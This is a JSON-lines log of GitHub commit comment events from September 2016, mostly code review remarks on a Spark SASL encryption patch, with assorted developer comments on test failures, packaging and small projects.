{"id":"4505927925","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872925,"position":75,"line":75,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/CipherOption.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:31:49Z","updated_at":"2016-09-02T00:31:49Z","body":"2 space indent"}},"created_at":"2016-09-02T00:31:49Z"}
{"id":"4505928567","type":"CommitCommentEvent","actor":{"login":"MedievalNerd"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":18872927,"position":null,"line":null,"path":null,"commit_id":"250ecbd28b2cca8c6fb9fab2af1a6963477ca285","created_at":"2016-09-02T00:32:03Z","updated_at":"2016-09-02T00:32:03Z","body":"@BevapDin Fair enough, looking back at the post it is quite useless and the random ticket picking even more. I wholeheartedly apologize for that. Considering I work in QA I cannot argue with anything you aid, and will take it on the nose deserving it.\r\n\r\nI'll have to familiarize myself with the 'due process' here since I am obviously not. As lame as an attempt it was, it was in good intention. But the road to hell, and all that jazz.\r\n\r\nSorry mate!\r\n\r\n"}},"created_at":"2016-09-02T00:32:03Z"}
{"id":"4505928572","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/libretro-prboom"},"payload":{"comment":{"id":18872928,"position":null,"line":null,"path":null,"commit_id":"d690904286f1b0645c7b62a15b4f7f81905d06d3","created_at":"2016-09-02T00:32:03Z","updated_at":"2016-09-02T00:32:03Z","body":"That's how the original Hexen/Heretic/Doom codebases looked like, and the aim here is to bring Heretic/Hexen/Doom together."}},"created_at":"2016-09-02T00:32:03Z"}
{"id":"4505930102","type":"CommitCommentEvent","actor":{"login":"keltheceo"},"repo":{"name":"JuniorNodeDevs/session"},"payload":{"comment":{"id":18872930,"position":null,"line":null,"path":null,"commit_id":"43a4248ffc4076c5491b6172ecd0125bab57bcb0","created_at":"2016-09-02T00:32:33Z","updated_at":"2016-09-02T00:32:33Z","body":"Yo good job crazy"}},"created_at":"2016-09-02T00:32:33Z"}
{"id":"4505930483","type":"CommitCommentEvent","actor":{"login":"vdidenko"},"repo":{"name":"vdidenko/simple-binary-encoding"},"payload":{"comment":{"id":18872931,"position":null,"line":null,"path":null,"commit_id":"49ec8d5599ab4d48dbd5ab8c42716558ac859ea7","created_at":"2016-09-02T00:32:42Z","updated_at":"2016-09-02T00:32:42Z","body":"Test results are:\r\n\r\n```\r\nTesting started at 7:23 PM ...\r\nRunning main() from gtest_main.cc\r\n\r\n.../sbe/sbe-tool/src/test/cpp/ChArrTest.cpp:49: Failure\r\nValue of: turnaround(TEST_STRING)\r\n  Actual: \"test\\0\\0\"\r\nExpected: TEST_STRING\r\nWhich is: \"test\"\r\n\r\n.../sbe/sbe-tool/src/test/cpp/ChArrTest.cpp:50: Failure\r\nValue of: turnaround(TEST0STRING)\r\n  Actual: \"test\\0\\0\"\r\nExpected: TEST0STRING\r\nWhich is: \"te\"\r\n\r\n.../sbe/sbe-tool/src/test/cpp/ChArrTest.cpp:53: Failure\r\nValue of: result\r\n  Actual: \"test\\0\\0\"\r\nExpected: TESTNSTRING\r\nWhich is: \"te\\nst\"\r\n\r\n\r\nProcess finished with exit code 1\r\n```\r\n\r\nNote no failure on `ChArrTest.cpp:54`\r\n\r\nRan on c++ (Ubuntu 5.4.0-6ubuntu1~16.04.2) 5.4.0 20160609"}},"created_at":"2016-09-02T00:32:42Z"}
{"id":"4505930775","type":"CommitCommentEvent","actor":{"login":"spwhitton"},"repo":{"name":"jbarlow83/OCRmyPDF"},"payload":{"comment":{"id":18872932,"position":null,"line":null,"path":null,"commit_id":"325cc0beca8f268744779f5aa5e17061626e440f","created_at":"2016-09-02T00:32:47Z","updated_at":"2016-09-02T00:32:47Z","body":"On Thu, Sep 01, 2016 at 04:30:11PM -0700, jbarlow83 wrote:\n> I experimented and it seems that py.test is designed to take care of this\n> automatically (provided a package has tests outside its package source tree, as\n> with ocrmypdf). If running via python3 setup.py test (to test the package\n> before installation) py.test inserts the uninstalled package into sys.path (I\n> think by way of a temporary installation). If run as py.test it will take the\n> system package because it changes PWD and runs each test in its directory.\n> \n> So, with your patch applied, it did all work properly (no crossover of\n> uninstalled/installed versions) before, but I now I understand why it works,\n> which makes me feel a lot better about it. With your patch applied python3\n> setup.py test should work on Debian and other platforms as expected without\n> patching.\n\nThat sounds great.  Thank you for investigating this.  I didn't realise\nmy patch was that good ;)\n\n-- \nSean Whitton\n"}},"created_at":"2016-09-02T00:32:47Z"}
{"id":"4505930810","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872933,"position":13,"line":36,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:32:47Z","updated_at":"2016-09-02T00:32:47Z","body":"wrong order for import. Move this line after L28"}},"created_at":"2016-09-02T00:32:47Z"}
{"id":"4505931014","type":"CommitCommentEvent","actor":{"login":"maxogden"},"repo":{"name":"maxogden/concat-stream"},"payload":{"comment":{"id":18872934,"position":null,"line":null,"path":null,"commit_id":"3e285ba5e5b10b7c98552217f5c1023829efe69e","created_at":"2016-09-02T00:32:51Z","updated_at":"2016-09-02T00:32:51Z","body":"> This was filed as a public report and was disclosed but not fixed for 13 days?\r\n> I sent a private report for a reason, not sure why this was handled this way.\r\n\r\n<img width=\"78\" alt=\"screen shot 2016-09-01 at 5 32 29 pm\" src=\"https://cloud.githubusercontent.com/assets/39759/18188826/1abc6d62-706a-11e6-9086-95af4ad357a0.png\">\r\n"}},"created_at":"2016-09-02T00:32:51Z"}
{"id":"4505932169","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872937,"position":30,"line":141,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:33:15Z","updated_at":"2016-09-02T00:33:15Z","body":"2 space indent"}},"created_at":"2016-09-02T00:33:15Z"}
{"id":"4505933574","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872940,"position":32,"line":143,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslClientBootstrap.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:33:41Z","updated_at":"2016-09-02T00:33:41Z","body":"the same indent issue. I will stop figuring this out."}},"created_at":"2016-09-02T00:33:41Z"}
{"id":"4505935076","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872947,"position":15,"line":40,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:34:11Z","updated_at":"2016-09-02T00:34:11Z","body":"Wrong import order."}},"created_at":"2016-09-02T00:34:11Z"}
{"id":"4505935865","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872950,"position":22,"line":67,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:34:26Z","updated_at":"2016-09-02T00:34:26Z","body":"remove this line"}},"created_at":"2016-09-02T00:34:26Z"}
{"id":"4505939066","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872954,"position":81,"line":112,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:35:33Z","updated_at":"2016-09-02T00:35:33Z","body":"Why not throw the original exception instead?"}},"created_at":"2016-09-02T00:35:33Z"}
{"id":"4505945189","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872970,"position":158,"line":213,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:37:37Z","updated_at":"2016-09-02T00:37:37Z","body":"Can you log an warning here in case nextBytes takes longer than 2s?"}},"created_at":"2016-09-02T00:37:37Z"}
{"id":"4505947154","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872973,"position":29,"line":29,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:38:17Z","updated_at":"2016-09-02T00:38:17Z","body":"Wrong order of import. I will stop figuring this out."}},"created_at":"2016-09-02T00:38:17Z"}
{"id":"4505947956","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872974,"position":44,"line":44,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:38:34Z","updated_at":"2016-09-02T00:38:34Z","body":"Remove this line"}},"created_at":"2016-09-02T00:38:34Z"}
{"id":"4505948496","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18872976,"position":48,"line":48,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:38:46Z","updated_at":"2016-09-02T00:38:46Z","body":"Too far indent."}},"created_at":"2016-09-02T00:38:46Z"}
{"id":"4505950001","type":"CommitCommentEvent","actor":{"login":"lindseybradford"},"repo":{"name":"lindseybradford/bottle_admin_fed"},"payload":{"comment":{"id":18872978,"position":4,"line":43,"path":"dist/index.html","commit_id":"9f551c289d22225b485219009968c0116630368b","created_at":"2016-09-02T00:39:22Z","updated_at":"2016-09-02T00:39:22Z","body":"@will - this is the wrapper that you'll need to make the sidebar scroll on overflow properly."}},"created_at":"2016-09-02T00:39:22Z"}
{"id":"4505951353","type":"CommitCommentEvent","actor":{"login":"lindseybradford"},"repo":{"name":"lindseybradford/bottle_admin_fed"},"payload":{"comment":{"id":18872981,"position":8,"line":43,"path":"dist/index.html","commit_id":"9f551c289d22225b485219009968c0116630368b","created_at":"2016-09-02T00:39:54Z","updated_at":"2016-09-02T00:39:54Z","body":"@will - this 'sc_wr\" is the wrapper that you'll need to make the sidebar scroll on overflow properly."}},"created_at":"2016-09-02T00:39:54Z"}
{"id":"4505952567","type":"CommitCommentEvent","actor":{"login":"bobjacobsen"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18872982,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T00:40:16Z","updated_at":"2016-09-02T00:40:16Z","body":"Somehow, Eclipse is getting confused about which class definitions to use for the annotations.  (The situation is inherently confusing due to JSR-305 and JSR-308 overlapping)\n\nI’m not power user of Eclipse. My installed version is pretty old and needs to be updated.  I can work on that this weekend. \n\nAs a test now, could you (somehow) which .jar file defines `@CheckForNull`?  It should be coming from lib/jsr305.jar. If it points to somewhere else, that’s an indication of what’s going wrong.\n\n"}},"created_at":"2016-09-02T00:40:16Z"}
{"id":"4505953996","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"TytanGat/packages_apps_TRomExtRas"},"payload":{"comment":{"id":18872983,"position":null,"line":null,"path":null,"commit_id":"b96a1df6be59e71de6de08ed5e08fd0416f949b1","created_at":"2016-09-02T00:40:45Z","updated_at":"2016-09-02T00:40:45Z","body":"wrong commit name but true changes :P"}},"created_at":"2016-09-02T00:40:45Z"}
{"id":"4505961364","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"omnirom/android_bootable_recovery"},"payload":{"comment":{"id":18872993,"position":null,"line":null,"path":null,"commit_id":"b8e985c6a29dff748a44ffc9a142c8244ae18099","created_at":"2016-09-02T00:43:17Z","updated_at":"2016-09-02T00:43:17Z","body":"with this change , still cannt flash the aosp 7.0 rom ,\r\nnot fully compat with the aosp 7.0 rom, \r\nand in aosp 7.0 rom's , ` file_context` is change to `file_context.bin` "}},"created_at":"2016-09-02T00:43:17Z"}
{"id":"4505962089","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18872994,"position":5,"line":39,"path":"ficbot.js","commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:43:31Z","updated_at":"2016-09-02T00:43:31Z","body":"Backslashes and brackets are used in LaTeX commands, so those are replaced immediately as they are added in chapter.push"}},"created_at":"2016-09-02T00:43:31Z"}
{"id":"4505964620","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873001,"position":32,"line":76,"path":"ficbot.js","commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:44:25Z","updated_at":"2016-09-02T00:44:25Z","body":"Lines 67, 76, and 77 really shouldn't be necessary, but I can't tell what's being escaped through all these steps"}},"created_at":"2016-09-02T00:44:25Z"}
{"id":"4505965470","type":"CommitCommentEvent","actor":{"login":"NUmeroAndDev"},"repo":{"name":"NUmeroAndDev/MemoClient-android"},"payload":{"comment":{"id":18873003,"position":null,"line":null,"path":null,"commit_id":"848fff3a7a04ef0a0bf5bf2aeb2fbc3d1d6bdc41","created_at":"2016-09-02T00:44:43Z","updated_at":"2016-09-02T00:44:43Z","body":"ボタンを2回押すことになるため、buttonのfocusを別のviewに当てる"}},"created_at":"2016-09-02T00:44:43Z"}
{"id":"4505965651","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873004,"position":18,"line":63,"path":"ficbot.js","commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:44:47Z","updated_at":"2016-09-02T00:44:47Z","body":"Thanks to http://stackoverflow.com/questions/15604140/replace-multiple-strings-with-multiple-other-strings!"}},"created_at":"2016-09-02T00:44:47Z"}
{"id":"4505967113","type":"CommitCommentEvent","actor":{"login":"lubien"},"repo":{"name":"DestructHub/ProjectEuler"},"payload":{"comment":{"id":18873009,"position":19,"line":19,"path":"Problem017/Elixir/solution_1.exs","commit_id":"08c23caf1bb186a7436f024b2f4c776d72d4aac6","created_at":"2016-09-02T00:45:16Z","updated_at":"2016-09-02T00:45:16Z","body":"I must update this comment "}},"created_at":"2016-09-02T00:45:16Z"}
{"id":"4505968814","type":"CommitCommentEvent","actor":{"login":"JamesOluteBailey"},"repo":{"name":"JamesOluteBailey/ComputerHistoryWebpage"},"payload":{"comment":{"id":18873016,"position":null,"line":null,"path":null,"commit_id":"63233980cb6873334ef42c318eda1b27a1824dcc","created_at":"2016-09-02T00:45:50Z","updated_at":"2016-09-02T00:45:50Z","body":"Atari code"}},"created_at":"2016-09-02T00:45:50Z"}
{"id":"4505969339","type":"CommitCommentEvent","actor":{"login":"lorenauribe"},"repo":{"name":"lorenauribe/hoja-de-vidalore"},"payload":{"comment":{"id":18873018,"position":null,"line":null,"path":null,"commit_id":"1a3f53dd691c5a4bc6f2e60df11f6c6f0da04b22","created_at":"2016-09-02T00:45:59Z","updated_at":"2016-09-02T00:45:59Z","body":"[Hoja de vida 2016-LORENA URIBE RODRIGUEZ (1).pdf](https://github.com/lorenauribe/hoja-de-vidalore/files/450980/Hoja.de.vida.2016-LORENA.URIBE.RODRIGUEZ.1.pdf)\r\n"}},"created_at":"2016-09-02T00:45:59Z"}
{"id":"4505970422","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18873021,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T00:46:19Z","updated_at":"2016-09-02T00:46:19Z","body":"Hey, do you need help? I started the same project but I stopped. You can merge this there and I will give you perms to commit... я тоже говорю по русски "}},"created_at":"2016-09-02T00:46:19Z"}
{"id":"4505970921","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18873024,"position":null,"line":null,"path":null,"commit_id":"683177bac0f740031fddc073de4247485579b937","created_at":"2016-09-02T00:46:29Z","updated_at":"2016-09-02T00:46:29Z","body":";) \r\n\r\n`auto` (deduce the type) was introduced in C++11..."}},"created_at":"2016-09-02T00:46:29Z"}
{"id":"4505971379","type":"CommitCommentEvent","actor":{"login":"lordKnighton"},"repo":{"name":"JuniorNodeDevs/session"},"payload":{"comment":{"id":18873025,"position":null,"line":null,"path":null,"commit_id":"43a4248ffc4076c5491b6172ecd0125bab57bcb0","created_at":"2016-09-02T00:46:39Z","updated_at":"2016-09-02T00:46:39Z","body":"Yea what ever, you dick haha :) "}},"created_at":"2016-09-02T00:46:39Z"}
{"id":"4505976038","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873034,"position":null,"line":null,"path":null,"commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:48:13Z","updated_at":"2016-09-02T00:48:13Z","body":"LaTeX reserved characters: `& % $ # _ { } ~ ^ \\`\r\nAngle brackets `< >` render as `¡ ¿` because of a font encoding issue.\r\nJavaScript Regex special characters ([maybe](http://stackoverflow.com/questions/4025482/cant-escape-the-backslash-with-regex)): `\\ ^ $ * + ? .`\r\n"}},"created_at":"2016-09-02T00:48:13Z"}
{"id":"4505977804","type":"CommitCommentEvent","actor":{"login":"phase"},"repo":{"name":"maorninja/Blargboard-XD"},"payload":{"comment":{"id":18873038,"position":null,"line":null,"path":null,"commit_id":"126559cd6c5335235d33b517efd81771bdbf1189","created_at":"2016-09-02T00:48:49Z","updated_at":"2016-09-02T00:48:49Z","body":"You could have just forked my repository. I probably would have merged any good changes you made.\r\n\r\nThis was mentioned to be insecure by @AileenLumina. Something about putting something in `.htaccess`."}},"created_at":"2016-09-02T00:48:49Z"}
{"id":"4505979705","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873041,"position":24,"line":69,"path":"ficbot.js","commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:49:27Z","updated_at":"2016-09-02T00:49:27Z","body":"Before tried\r\n```\r\n.replace(/</g, \"\\\\textless\")\r\n.replace(/>/g, \"\\\\textgreater\")\r\n```\r\nhere, but changed to lines 76 and 77"}},"created_at":"2016-09-02T00:49:27Z"}
{"id":"4505980653","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18873045,"position":35,"line":79,"path":"ficbot.js","commit_id":"81a10f4ff30352f217e9c251ffb9509460ec843d","created_at":"2016-09-02T00:49:45Z","updated_at":"2016-09-02T00:49:45Z","body":"maybe replace space double-ups"}},"created_at":"2016-09-02T00:49:45Z"}
{"id":"4505983069","type":"CommitCommentEvent","actor":{"login":"rafaelcn"},"repo":{"name":"DestructHub/ProjectEuler"},"payload":{"comment":{"id":18873052,"position":19,"line":19,"path":"Problem017/Elixir/solution_1.exs","commit_id":"08c23caf1bb186a7436f024b2f4c776d72d4aac6","created_at":"2016-09-02T00:50:36Z","updated_at":"2016-09-02T00:50:36Z","body":"Modify the comment, push to your branch and create a new PR."}},"created_at":"2016-09-02T00:50:36Z"}
{"id":"4505989033","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873062,"position":174,"line":174,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:52:46Z","updated_at":"2016-09-02T00:52:46Z","body":"No need for a method. Plz use ```Assert (\"AES/CBC/NoPadding\".equals(transformation) || \"AES/CTR/NoPadding\".equals(transformation)) : \"AES cipher transformation is not supported\" + transformation;```"}},"created_at":"2016-09-02T00:52:46Z"}
{"id":"4505996618","type":"CommitCommentEvent","actor":{"login":"choekstr"},"repo":{"name":"raoulvdberge/refinedstorage"},"payload":{"comment":{"id":18873076,"position":null,"line":null,"path":null,"commit_id":"85856a4eebc2e9ebc8014593acaa795c0eea8e8f","created_at":"2016-09-02T00:55:28Z","updated_at":"2016-09-02T00:55:28Z","body":"VERY much appreciated.  This will make life MUCH better!  Thank you thank you thank you."}},"created_at":"2016-09-02T00:55:28Z"}
{"id":"4505997371","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873079,"position":39,"line":39,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:55:44Z","updated_at":"2016-09-02T00:55:44Z","body":"Do you have a better name for it like ```AesSaslServer```? No need to say Spark here because you're not a developer API."}},"created_at":"2016-09-02T00:55:44Z"}
{"id":"4505998393","type":"CommitCommentEvent","actor":{"login":"Birajhow"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18873085,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-02T00:56:10Z","updated_at":"2016-09-02T00:56:10Z","body":"Eita, me esqueci completamente do artigo em formato wiki. Vou dar um jeito nisso, tentarei terminar até amanhã."}},"created_at":"2016-09-02T00:56:10Z"}
{"id":"4505998971","type":"CommitCommentEvent","actor":{"login":"zigomir"},"repo":{"name":"vuejs-templates/webpack-simple"},"payload":{"comment":{"id":18873088,"position":null,"line":null,"path":null,"commit_id":"65d5e9dcc4da899d737b063667b3eb3a1344b461","created_at":"2016-09-02T00:56:22Z","updated_at":"2016-09-02T00:56:22Z","body":"Because 2.0 has a release candidate out. If you look at the [README.md](https://github.com/vuejs-templates/webpack-simple#webpack-simple) you'll see how to use 1.0. We'll soon remove 2.0 templates. /cc @yyx990803 "}},"created_at":"2016-09-02T00:56:22Z"}
{"id":"4505999554","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18873091,"position":null,"line":null,"path":null,"commit_id":"f01ad433d658d690fcb786689c4bd5f3fb6d8cfa","created_at":"2016-09-02T00:56:35Z","updated_at":"2016-09-02T00:56:35Z","body":"It does a relogin and most of the time the account gets the same endpoint. I don't think you can do anything to get a new one forcefully."}},"created_at":"2016-09-02T00:56:35Z"}
{"id":"4506004854","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"slycoder/react-native-firestack"},"payload":{"comment":{"id":18873107,"position":null,"line":null,"path":null,"commit_id":"b098a60a18697c8d7f8440324aa2d01b2bd17f22","created_at":"2016-09-02T00:58:35Z","updated_at":"2016-09-02T00:58:35Z","body":"I disabled this in master as the problem wasn't a build error, it was a run-time error that another user saw. I'll try to recreate it tomorrow/this weekend so we can figure out how best to get this back in. "}},"created_at":"2016-09-02T00:58:35Z"}
{"id":"4506005813","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873111,"position":27,"line":151,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslServer.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:58:58Z","updated_at":"2016-09-02T00:58:58Z","body":"Remove this line."}},"created_at":"2016-09-02T00:58:58Z"}
{"id":"4506007026","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873112,"position":47,"line":151,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslServer.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T00:59:24Z","updated_at":"2016-09-02T00:59:24Z","body":"No need to remove this line"}},"created_at":"2016-09-02T00:59:24Z"}
{"id":"4506011798","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18873125,"position":null,"line":null,"path":null,"commit_id":"b666443b845f00c286221941c78b405c282ba51c","created_at":"2016-09-02T01:01:06Z","updated_at":"2016-09-02T01:01:06Z","body":"++"}},"created_at":"2016-09-02T01:01:06Z"}
{"id":"4506012991","type":"CommitCommentEvent","actor":{"login":"yuanlaimiao"},"repo":{"name":"yuanlaimiao/test"},"payload":{"comment":{"id":18873128,"position":null,"line":null,"path":null,"commit_id":"75dab2d7e6affe5a99cdc1eb0d20ee913e029ed3","created_at":"2016-09-02T01:01:31Z","updated_at":"2016-09-02T01:01:31Z","body":"test1"}},"created_at":"2016-09-02T01:01:31Z"}
{"id":"4506012998","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18873129,"position":null,"line":null,"path":null,"commit_id":"efc1cffe2b709a531d0ce8fa15790ff254ba1b02","created_at":"2016-09-02T01:01:32Z","updated_at":"2016-09-02T01:01:32Z","body":"++"}},"created_at":"2016-09-02T01:01:32Z"}
{"id":"4506013535","type":"CommitCommentEvent","actor":{"login":"zjhmale"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":18873133,"position":null,"line":null,"path":null,"commit_id":"b9c77924a07d22162e931590d0cf9d464a8373f7","created_at":"2016-09-02T01:01:42Z","updated_at":"2016-09-02T01:01:42Z","body":"@rikvdkleij so any links about this new protocol? i mean how to communicate with `stack repl`."}},"created_at":"2016-09-02T01:01:42Z"}
{"id":"4506013746","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18873135,"position":null,"line":null,"path":null,"commit_id":"ac3db26957c21bb132f789709b20a72c8864470d","created_at":"2016-09-02T01:01:47Z","updated_at":"2016-09-02T01:01:47Z","body":"++"}},"created_at":"2016-09-02T01:01:47Z"}
{"id":"4506017848","type":"CommitCommentEvent","actor":{"login":"winningsix"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18873141,"position":47,"line":47,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-02T01:03:21Z","updated_at":"2016-09-02T01:03:21Z","body":"Can we abstract an interface for ```Wrap``` and ```Unwrap``` methods? Then make SparkSaslClient and SparkSaslAes  implement it."}},"created_at":"2016-09-02T01:03:21Z"}
{"id":"4506021611","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18873147,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T01:04:36Z","updated_at":"2016-09-02T01:04:36Z","body":"iteration (macumber) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T01:04:36Z"}
{"id":"4506022712","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18873149,"position":null,"line":null,"path":null,"commit_id":"93aa2da2a288e672d5dd2beb8f9a0cccbc2cf16a","created_at":"2016-09-02T01:05:00Z","updated_at":"2016-09-02T01:05:00Z","body":"++"}},"created_at":"2016-09-02T01:05:00Z"}
{"id":"4506028383","type":"CommitCommentEvent","actor":{"login":"DavidDudson"},"repo":{"name":"DavidDudson/InlineMacros"},"payload":{"comment":{"id":18873160,"position":null,"line":null,"path":null,"commit_id":"a4446cdc00d80226c29701b60bf5261a4b32cca8","created_at":"2016-09-02T01:06:58Z","updated_at":"2016-09-02T01:06:58Z","body":"@ariwaranosai Due to your discovery I have added Windows CI support. Thanks"}},"created_at":"2016-09-02T01:06:58Z"}
